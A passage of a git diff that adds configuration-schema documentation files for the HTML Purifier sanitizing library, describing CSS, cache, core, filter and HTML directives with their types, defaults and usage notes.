+++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedProperties.txt @@ -0,0 +1,18 @@ +CSS.AllowedProperties +TYPE: lookup/null +VERSION: 3.1.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + If HTML Purifier's style attributes set is unsatisfactory for your needs, + you can overload it with your own list of tags to allow. Note that this + method is subtractive: it does its job by taking away from HTML Purifier + usual feature set, so you cannot add an attribute that HTML Purifier never + supported in the first place. +</p> +<p> + <strong>Warning:</strong> If another directive conflicts with the + elements here, <em>that</em> directive will win and override. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.DefinitionRev.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.DefinitionRev.txt new file mode 100644 index 000000000..5cb7dda3b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.DefinitionRev.txt @@ -0,0 +1,11 @@ +CSS.DefinitionRev +TYPE: int +VERSION: 2.0.0 +DEFAULT: 1 +--DESCRIPTION-- + +<p> + Revision identifier for your custom definition. See + %HTML.DefinitionRev for details. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.ForbiddenProperties.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.ForbiddenProperties.txt new file mode 100644 index 000000000..f1f5c5f12 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.ForbiddenProperties.txt @@ -0,0 +1,13 @@ +CSS.ForbiddenProperties +TYPE: lookup +VERSION: 4.2.0 +DEFAULT: array() +--DESCRIPTION-- +<p> + This is the logical inverse of %CSS.AllowedProperties, and it will + override that directive or any other directive. If possible, + %CSS.AllowedProperties is recommended over this directive, + because it can sometimes be difficult to tell whether or not you've + forbidden all of the CSS properties you truly would like to disallow. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.MaxImgLength.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.MaxImgLength.txt new file mode 100644 index 000000000..7a3291470 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.MaxImgLength.txt @@ -0,0 +1,16 @@ +CSS.MaxImgLength +TYPE: string/null +DEFAULT: '1200px' +VERSION: 3.1.1 +--DESCRIPTION-- +<p> + This parameter sets the maximum allowed length on <code>img</code> tags, + effectively the <code>width</code> and <code>height</code> properties. + Only absolute units of measurement (in, pt, pc, mm, cm) and pixels (px) are allowed. This is + in place to prevent imagecrash attacks, disable with null at your own risk. + This directive is similar to %HTML.MaxImgLength, and both should be + concurrently edited, although there are + subtle differences in the input format (the CSS max is a number with + a unit). +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Proprietary.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Proprietary.txt new file mode 100644 index 000000000..148eedb8b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Proprietary.txt @@ -0,0 +1,10 @@ +CSS.Proprietary +TYPE: bool +VERSION: 3.0.0 +DEFAULT: false +--DESCRIPTION-- + +<p> + Whether or not to allow safe, proprietary CSS values. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Trusted.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Trusted.txt new file mode 100644 index 000000000..e733a61e8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.Trusted.txt @@ -0,0 +1,9 @@ +CSS.Trusted +TYPE: bool +VERSION: 4.2.1 +DEFAULT: false +--DESCRIPTION-- +Indicates whether or not the user's CSS input is trusted or not. If the +input is trusted, a more expansive set of allowed properties. See +also %HTML.Trusted. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.DefinitionImpl.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.DefinitionImpl.txt new file mode 100644 index 000000000..c486724c8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.DefinitionImpl.txt @@ -0,0 +1,14 @@ +Cache.DefinitionImpl +TYPE: string/null +VERSION: 2.0.0 +DEFAULT: 'Serializer' +--DESCRIPTION-- + +This directive defines which method to use when caching definitions, +the complex data-type that makes HTML Purifier tick. Set to null +to disable caching (not recommended, as you will see a definite +performance degradation). + +--ALIASES-- +Core.DefinitionCache +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPath.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPath.txt new file mode 100644 index 000000000..54036507d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPath.txt @@ -0,0 +1,13 @@ +Cache.SerializerPath +TYPE: string/null +VERSION: 2.0.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + Absolute path with no trailing slash to store serialized definitions in. + Default is within the + HTML Purifier library inside DefinitionCache/Serializer. This + path must be writable by the webserver. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPermissions.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPermissions.txt new file mode 100644 index 000000000..b2b83d9ab --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Cache.SerializerPermissions.txt @@ -0,0 +1,11 @@ +Cache.SerializerPermissions +TYPE: int +VERSION: 4.3.0 +DEFAULT: 0755 +--DESCRIPTION-- + +<p> + Directory permissions of the files and directories created inside + the DefinitionCache/Serializer or other custom serializer path. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.AggressivelyFixLt.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.AggressivelyFixLt.txt new file mode 100644 index 000000000..568cbf3b3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.AggressivelyFixLt.txt @@ -0,0 +1,18 @@ +Core.AggressivelyFixLt +TYPE: bool +VERSION: 2.1.0 +DEFAULT: true +--DESCRIPTION-- +<p> + This directive enables aggressive pre-filter fixes HTML Purifier can + perform in order to ensure that open angled-brackets do not get killed + during parsing stage. Enabling this will result in two preg_replace_callback + calls and at least two preg_replace calls for every HTML document parsed; + if your users make very well-formed HTML, you can set this directive false. + This has no effect when DirectLex is used. +</p> +<p> + <strong>Notice:</strong> This directive's default turned from false to true + in HTML Purifier 3.2.0. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.CollectErrors.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.CollectErrors.txt new file mode 100644 index 000000000..d7317911f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.CollectErrors.txt @@ -0,0 +1,12 @@ +Core.CollectErrors +TYPE: bool +VERSION: 2.0.0 +DEFAULT: false +--DESCRIPTION-- + +Whether or not to collect errors found while filtering the document. This +is a useful way to give feedback to your users. <strong>Warning:</strong> +Currently this feature is very patchy and experimental, with lots of +possible error messages not yet implemented. It will not cause any +problems, but it may not help your users either. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ColorKeywords.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ColorKeywords.txt new file mode 100644 index 000000000..c572c14ec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ColorKeywords.txt @@ -0,0 +1,29 @@ +Core.ColorKeywords +TYPE: hash +VERSION: 2.0.0 +--DEFAULT-- +array ( + 'maroon' => '#800000', + 'red' => '#FF0000', + 'orange' => '#FFA500', + 'yellow' => '#FFFF00', + 'olive' => '#808000', + 'purple' => '#800080', + 'fuchsia' => '#FF00FF', + 'white' => '#FFFFFF', + 'lime' => '#00FF00', + 'green' => '#008000', + 'navy' => '#000080', + 'blue' => '#0000FF', + 'aqua' => '#00FFFF', + 'teal' => '#008080', + 'black' => '#000000', + 'silver' => '#C0C0C0', + 'gray' => '#808080', +) +--DESCRIPTION-- + +Lookup array of color names to six digit hexadecimal number corresponding +to color, with preceding hash mark. Used when parsing colors. The lookup +is done in a case-insensitive manner. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ConvertDocumentToFragment.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ConvertDocumentToFragment.txt new file mode 100644 index 000000000..64b114fce --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.ConvertDocumentToFragment.txt @@ -0,0 +1,14 @@ +Core.ConvertDocumentToFragment +TYPE: bool +DEFAULT: true +--DESCRIPTION-- + +This parameter determines whether or not the filter should convert +input that is a full document with html and body tags to a fragment +of just the contents of a body tag. This parameter is simply something +HTML Purifier can do during an edge-case: for most inputs, this +processing is not necessary. + +--ALIASES-- +Core.AcceptFullDocuments +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.DirectLexLineNumberSyncInterval.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.DirectLexLineNumberSyncInterval.txt new file mode 100644 index 000000000..36f16e07e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.DirectLexLineNumberSyncInterval.txt @@ -0,0 +1,17 @@ +Core.DirectLexLineNumberSyncInterval +TYPE: int +VERSION: 2.0.0 +DEFAULT: 0 +--DESCRIPTION-- + +<p> + Specifies the number of tokens the DirectLex line number tracking + implementations should process before attempting to resyncronize the + current line count by manually counting all previous new-lines. When + at 0, this functionality is disabled. Lower values will decrease + performance, and this is only strictly necessary if the counting + algorithm is buggy (in which case you should report it as a bug). + This has no effect when %Core.MaintainLineNumbers is disabled or DirectLex is + not being used. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EnableIDNA.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EnableIDNA.txt new file mode 100644 index 000000000..ce243c35d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EnableIDNA.txt @@ -0,0 +1,9 @@ +Core.EnableIDNA +TYPE: bool +DEFAULT: false +VERSION: 4.4.0 +--DESCRIPTION-- +Allows international domain names in URLs. This configuration option +requires the PEAR Net_IDNA2 module to be installed. It operates by +punycoding any internationalized host names for maximum portability. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Encoding.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Encoding.txt new file mode 100644 index 000000000..8bfb47c3a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Encoding.txt @@ -0,0 +1,15 @@ +Core.Encoding +TYPE: istring +DEFAULT: 'utf-8' +--DESCRIPTION-- +If for some reason you are unable to convert all webpages to UTF-8, you can +use this directive as a stop-gap compatibility change to let HTML Purifier +deal with non UTF-8 input. This technique has notable deficiencies: +absolutely no characters outside of the selected character encoding will be +preserved, not even the ones that have been ampersand escaped (this is due +to a UTF-8 specific <em>feature</em> that automatically resolves all +entities), making it pretty useless for anything except the most I18N-blind +applications, although %Core.EscapeNonASCIICharacters offers fixes this +trouble with another tradeoff. This directive only accepts ISO-8859-1 if +iconv is not enabled. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidChildren.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidChildren.txt new file mode 100644 index 000000000..4d5b5055c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidChildren.txt @@ -0,0 +1,10 @@ +Core.EscapeInvalidChildren +TYPE: bool +DEFAULT: false +--DESCRIPTION-- +When true, a child is found that is not allowed in the context of the +parent element will be transformed into text as if it were ASCII. When +false, that element and all internal tags will be dropped, though text will +be preserved. There is no option for dropping the element but preserving +child nodes. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidTags.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidTags.txt new file mode 100644 index 000000000..a7a5b249b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeInvalidTags.txt @@ -0,0 +1,7 @@ +Core.EscapeInvalidTags +TYPE: bool +DEFAULT: false +--DESCRIPTION-- +When true, invalid tags will be written back to the document as plain text. +Otherwise, they are silently dropped. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeNonASCIICharacters.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeNonASCIICharacters.txt new file mode 100644 index 000000000..abb499948 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.EscapeNonASCIICharacters.txt @@ -0,0 +1,13 @@ +Core.EscapeNonASCIICharacters +TYPE: bool +VERSION: 1.4.0 +DEFAULT: false +--DESCRIPTION-- +This directive overcomes a deficiency in %Core.Encoding by blindly +converting all non-ASCII characters into decimal numeric entities before +converting it to its native encoding. This means that even characters that +can be expressed in the non-UTF-8 encoding will be entity-ized, which can +be a real downer for encodings like Big5. It also assumes that the ASCII +repetoire is available, although this is the case for almost all encodings. +Anyway, use UTF-8! +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.HiddenElements.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.HiddenElements.txt new file mode 100644 index 000000000..915391edb --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.HiddenElements.txt @@ -0,0 +1,19 @@ +Core.HiddenElements +TYPE: lookup +--DEFAULT-- +array ( + 'script' => true, + 'style' => true, +) +--DESCRIPTION-- + +<p> + This directive is a lookup array of elements which should have their + contents removed when they are not allowed by the HTML definition. + For example, the contents of a <code>script</code> tag are not + normally shown in a document, so if script tags are to be removed, + their contents should be removed to. This is opposed to a <code>b</code> + tag, which defines some presentational changes but does not hide its + contents. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Language.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Language.txt new file mode 100644 index 000000000..233fca14f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.Language.txt @@ -0,0 +1,10 @@ +Core.Language +TYPE: string +VERSION: 2.0.0 +DEFAULT: 'en' +--DESCRIPTION-- + +ISO 639 language code for localizable things in HTML Purifier to use, +which is mainly error reporting. There is currently only an English (en) +translation, so this directive is currently useless. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.LexerImpl.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.LexerImpl.txt new file mode 100644 index 000000000..8983e2cca --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.LexerImpl.txt @@ -0,0 +1,34 @@ +Core.LexerImpl +TYPE: mixed/null +VERSION: 2.0.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + This parameter determines what lexer implementation can be used. The + valid values are: +</p> +<dl> + <dt><em>null</em></dt> + <dd> + Recommended, the lexer implementation will be auto-detected based on + your PHP-version and configuration. + </dd> + <dt><em>string</em> lexer identifier</dt> + <dd> + This is a slim way of manually overridding the implementation. + Currently recognized values are: DOMLex (the default PHP5 +implementation) + and DirectLex (the default PHP4 implementation). Only use this if + you know what you are doing: usually, the auto-detection will + manage things for cases you aren't even aware of. + </dd> + <dt><em>object</em> lexer instance</dt> + <dd> + Super-advanced: you can specify your own, custom, implementation that + implements the interface defined by <code>HTMLPurifier_Lexer</code>. + I may remove this option simply because I don't expect anyone + to use it. + </dd> +</dl> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.MaintainLineNumbers.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.MaintainLineNumbers.txt new file mode 100644 index 000000000..eb841a759 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.MaintainLineNumbers.txt @@ -0,0 +1,16 @@ +Core.MaintainLineNumbers +TYPE: bool/null +VERSION: 2.0.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + If true, HTML Purifier will add line number information to all tokens. + This is useful when error reporting is turned on, but can result in + significant performance degradation and should not be used when + unnecessary. This directive must be used with the DirectLex lexer, + as the DOMLex lexer does not (yet) support this functionality. + If the value is null, an appropriate value will be selected based + on other configuration. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.NormalizeNewlines.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.NormalizeNewlines.txt new file mode 100644 index 000000000..d77f5360d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.NormalizeNewlines.txt @@ -0,0 +1,11 @@ +Core.NormalizeNewlines +TYPE: bool +VERSION: 4.2.0 +DEFAULT: true +--DESCRIPTION-- +<p> + Whether or not to normalize newlines to the operating + system default. When <code>false</code>, HTML Purifier + will attempt to preserve mixed newline files. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveInvalidImg.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveInvalidImg.txt new file mode 100644 index 000000000..4070c2a0d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveInvalidImg.txt @@ -0,0 +1,12 @@ +Core.RemoveInvalidImg +TYPE: bool +DEFAULT: true +VERSION: 1.3.0 +--DESCRIPTION-- + +<p> + This directive enables pre-emptive URI checking in <code>img</code> + tags, as the attribute validation strategy is not authorized to + remove elements from the document. Revert to pre-1.3.0 behavior by setting to false. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveProcessingInstructions.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveProcessingInstructions.txt new file mode 100644 index 000000000..3397d9f71 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveProcessingInstructions.txt @@ -0,0 +1,11 @@ +Core.RemoveProcessingInstructions +TYPE: bool +VERSION: 4.2.0 +DEFAULT: false +--DESCRIPTION-- +Instead of escaping processing instructions in the form <code><? ... +?></code>, remove it out-right. This may be useful if the HTML +you are validating contains XML processing instruction gunk, however, +it can also be user-unfriendly for people attempting to post PHP +snippets. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveScriptContents.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveScriptContents.txt new file mode 100644 index 000000000..a4cd966df --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Core.RemoveScriptContents.txt @@ -0,0 +1,12 @@ +Core.RemoveScriptContents +TYPE: bool/null +DEFAULT: NULL +VERSION: 2.0.0 +DEPRECATED-VERSION: 2.1.0 +DEPRECATED-USE: Core.HiddenElements +--DESCRIPTION-- +<p> + This directive enables HTML Purifier to remove not only script tags + but all of their contents. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.Custom.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.Custom.txt new file mode 100644 index 000000000..3db50ef20 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.Custom.txt @@ -0,0 +1,11 @@ +Filter.Custom +TYPE: list +VERSION: 3.1.0 +DEFAULT: array() +--DESCRIPTION-- +<p> + This directive can be used to add custom filters; it is nearly the + equivalent of the now deprecated <code>HTMLPurifier->addFilter()</code> + method. Specify an array of concrete implementations. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Escaping.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Escaping.txt new file mode 100644 index 000000000..16829bcda --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Escaping.txt @@ -0,0 +1,14 @@ +Filter.ExtractStyleBlocks.Escaping +TYPE: bool +VERSION: 3.0.0 +DEFAULT: true +ALIASES: Filter.ExtractStyleBlocksEscaping, FilterParam.ExtractStyleBlocksEscaping +--DESCRIPTION-- + +<p> + Whether or not to escape the dangerous characters <, > and & + as \3C, \3E and \26, respectively. This is can be safely set to false + if the contents of StyleBlocks will be placed in an external stylesheet, + where there is no risk of it being interpreted as HTML. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Scope.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Scope.txt new file mode 100644 index 000000000..7f95f54d1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.Scope.txt @@ -0,0 +1,29 @@ +Filter.ExtractStyleBlocks.Scope +TYPE: string/null +VERSION: 3.0.0 +DEFAULT: NULL +ALIASES: Filter.ExtractStyleBlocksScope, FilterParam.ExtractStyleBlocksScope +--DESCRIPTION-- + +<p> + If you would like users to be able to define external stylesheets, but + only allow them to specify CSS declarations for a specific node and + prevent them from fiddling with other elements, use this directive. + It accepts any valid CSS selector, and will prepend this to any + CSS declaration extracted from the document. For example, if this + directive is set to <code>#user-content</code> and a user uses the + selector <code>a:hover</code>, the final selector will be + <code>#user-content a:hover</code>. +</p> +<p> + The comma shorthand may be used; consider the above example, with + <code>#user-content, #user-content2</code>, the final selector will + be <code>#user-content a:hover, #user-content2 a:hover</code>. +</p> +<p> + <strong>Warning:</strong> It is possible for users to bypass this measure + using a naughty + selector. This is a bug in CSS Tidy 1.3, not HTML + Purifier, and I am working to get it fixed. Until then, HTML Purifier + performs a basic check to prevent this. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.TidyImpl.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.TidyImpl.txt new file mode 100644 index 000000000..6c231b2d7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.TidyImpl.txt @@ -0,0 +1,16 @@ +Filter.ExtractStyleBlocks.TidyImpl +TYPE: mixed/null +VERSION: 3.1.0 +DEFAULT: NULL +ALIASES: FilterParam.ExtractStyleBlocksTidyImpl +--DESCRIPTION-- +<p> + If left NULL, HTML Purifier will attempt to instantiate a <code>csstidy</code> + class to use for internal cleaning. This will usually be good enough. +</p> +<p> + However, for trusted user input, you can set this to <code>false</code> to + disable cleaning. In addition, you can supply your own concrete implementation + of Tidy's interface to use, although I don't know why you'd want to do that. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt new file mode 100644 index 000000000..078d08741 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt @@ -0,0 +1,74 @@ +Filter.ExtractStyleBlocks +TYPE: bool +VERSION: 3.1.0 +DEFAULT: false +EXTERNAL: CSSTidy +--DESCRIPTION-- +<p> + This directive turns on the style block extraction filter, which removes + <code>style</code> blocks from input HTML, cleans them up with CSSTidy, + and places them in the <code>StyleBlocks</code> context variable, for further + use by you, usually to be placed in an external stylesheet, or a + <code>style</code> block in the <code>head</code> of your document. +</p> +<p> + Sample usage: +</p> +<pre><![CDATA[ +<?php + header('Content-type: text/html; charset=utf-8'); + echo '<?xml version="1.0" encoding="UTF-8"?>'; +?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> +<head> + <title>Filter.ExtractStyleBlocks</title> +<?php + require_once '/path/to/library/HTMLPurifier.auto.php'; + require_once '/path/to/csstidy.class.php'; + + $dirty = '<style>body {color:#F00;}</style> Some text'; + + $config = HTMLPurifier_Config::createDefault(); + $config->set('Filter', 'ExtractStyleBlocks', true); + $purifier = new HTMLPurifier($config); + + $html = $purifier->purify($dirty); + + // This implementation writes the stylesheets to the styles/ directory. + // You can also echo the styles inside the document, but it's a bit + // more difficult to make sure they get interpreted properly by + // browsers; try the usual CSS armoring techniques. + $styles = $purifier->context->get('StyleBlocks'); + $dir = 'styles/'; + if (!is_dir($dir)) mkdir($dir); + $hash = sha1($_GET['html']); + foreach ($styles as $i => $style) { + file_put_contents($name = $dir . $hash . "_$i"); + echo '<link rel="stylesheet" type="text/css" href="'.$name.'" />'; + } +?> +</head> +<body> + <div> + <?php echo $html; ?> + </div> +</b]]><![CDATA[ody> +</html> +]]></pre> +<p> + <strong>Warning:</strong> It is possible for a user to mount an + imagecrash attack using this CSS. Counter-measures are difficult; + it is not simply enough to limit the range of CSS lengths (using + relative lengths with many nesting levels allows for large values + to be attained without actually specifying them in the stylesheet), + and the flexible nature of selectors makes it difficult to selectively + disable lengths on image tags (HTML Purifier, however, does disable + CSS width and height in inline styling). There are probably two effective + counter measures: an explicit width and height set to auto in all + images in your document (unlikely) or the disabling of width and + height (somewhat reasonable). Whether or not these measures should be + used is left to the reader. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt new file mode 100644 index 000000000..321eaa2d8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt @@ -0,0 +1,16 @@ +Filter.YouTube +TYPE: bool +VERSION: 3.1.0 +DEFAULT: false +--DESCRIPTION-- +<p> + <strong>Warning:</strong> Deprecated in favor of %HTML.SafeObject and + %Output.FlashCompat (turn both on to allow YouTube videos and other + Flash content). +</p> +<p> + This directive enables YouTube video embedding in HTML Purifier. Check + <a href="http://htmlpurifier.org/docs/enduser-youtube.html">this document + on embedding videos</a> for more information on what this filter does. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Allowed.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Allowed.txt new file mode 100644 index 000000000..0b2c106da --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Allowed.txt @@ -0,0 +1,25 @@ +HTML.Allowed +TYPE: itext/null +VERSION: 2.0.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + This is a preferred convenience directive that combines + %HTML.AllowedElements and %HTML.AllowedAttributes. + Specify elements and attributes that are allowed using: + <code>element1[attr1|attr2],element2...</code>. For example, + if you would like to only allow paragraphs and links, specify + <code>a[href],p</code>. You can specify attributes that apply + to all elements using an asterisk, e.g. <code>*[lang]</code>. + You can also use newlines instead of commas to separate elements. +</p> +<p> + <strong>Warning</strong>: + All of the constraints on the component directives are still enforced. + The syntax is a <em>subset</em> of TinyMCE's <code>valid_elements</code> + whitelist: directly copy-pasting it here will probably result in + broken whitelists. If %HTML.AllowedElements or %HTML.AllowedAttributes + are set, this directive has no effect. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedAttributes.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedAttributes.txt new file mode 100644 index 000000000..fcf093f17 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedAttributes.txt @@ -0,0 +1,19 @@ +HTML.AllowedAttributes +TYPE: lookup/null +VERSION: 1.3.0 +DEFAULT: 